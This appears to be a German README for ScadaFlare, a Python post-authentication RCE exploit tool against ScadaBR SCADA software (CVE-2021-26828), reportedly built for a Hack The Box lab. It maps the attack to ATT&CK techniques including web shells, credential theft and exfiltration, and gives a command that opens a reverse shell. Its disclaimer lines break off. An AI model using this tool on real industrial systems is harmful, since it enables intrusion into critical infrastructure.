
ScadaFlare Authentifiziertes RCE-Exploit-Framework für ScadaBR (CVE-2021-26828) OpenPLC ScadaBR
Ein modularer Post-Auth-RCE-Exploit, der auf ScadaBR <1.1.0 abzielt und für Red-Team-Einsätze erweitert wurde.

.jsp-Shell über view_edit.shtm hoch| Phase | Technik | ID |
|---|---|---|
| Erster Zugriff (nach Authentifizierung) | Valid Accounts | T1078 |
| Ausführung | Exploit Public-Facing Application | T1190 |
| Befehlsausführung | Web Shell | T1505.003 |
| Berechtigungsaktionen | Modify Web Content | T1505 |
| Zugriff auf Anmeldedaten | Credential in Configuration Files | T1552.001 |
| Erkundung | Remote System Discovery | T1018 |
| Exfiltration | Exfiltration Over Web Service | T1567.002 |
| Umgehung der Verteidigung | Proxy & Protocol Tunneling | T1090 |
Dieser Exploit wurde während der Analyse des HTB-Pro-Lab-Szenarios „Alchemy“ entwickelt. Der ursprüngliche PoC von Fellipe Oliveira war solide, aber:
In Python 2 geschrieben
Es fehlten moderne Funktionen wie Proxy-Unterstützung, Shell-Cleanup und Enumerations-Verkettung
Er war schwer zu erweitern oder in Red-Team-Workflows zu integrieren
Diese Version, ScadaFlare, ist eine vollständige Neufassung in Python 3 mit modularer Unterstützung, mehreren Evasions-Strategien, OS-Erkennungs-Override, Webhook-Integration, SOCKS-Proxy-Unterstützung und Enumerations-Ketten für den praktischen Einsatz durch Operatoren.
python3 scadaflare.py http://172.16.0.20:80 admin admin \
--reverse-ip 10.10.14.44 --reverse-port 4445 \
--verbose --cleanup
ScadaFlare ist ausschließlich konzipiert für:
Unbefugte Nutzung gegen reale industrielle Systeme kann:
Durch die Nutzung dieses Tools übernehmen Sie die volle Verantwortung für:
MIT-Lizenz – siehe LICENSE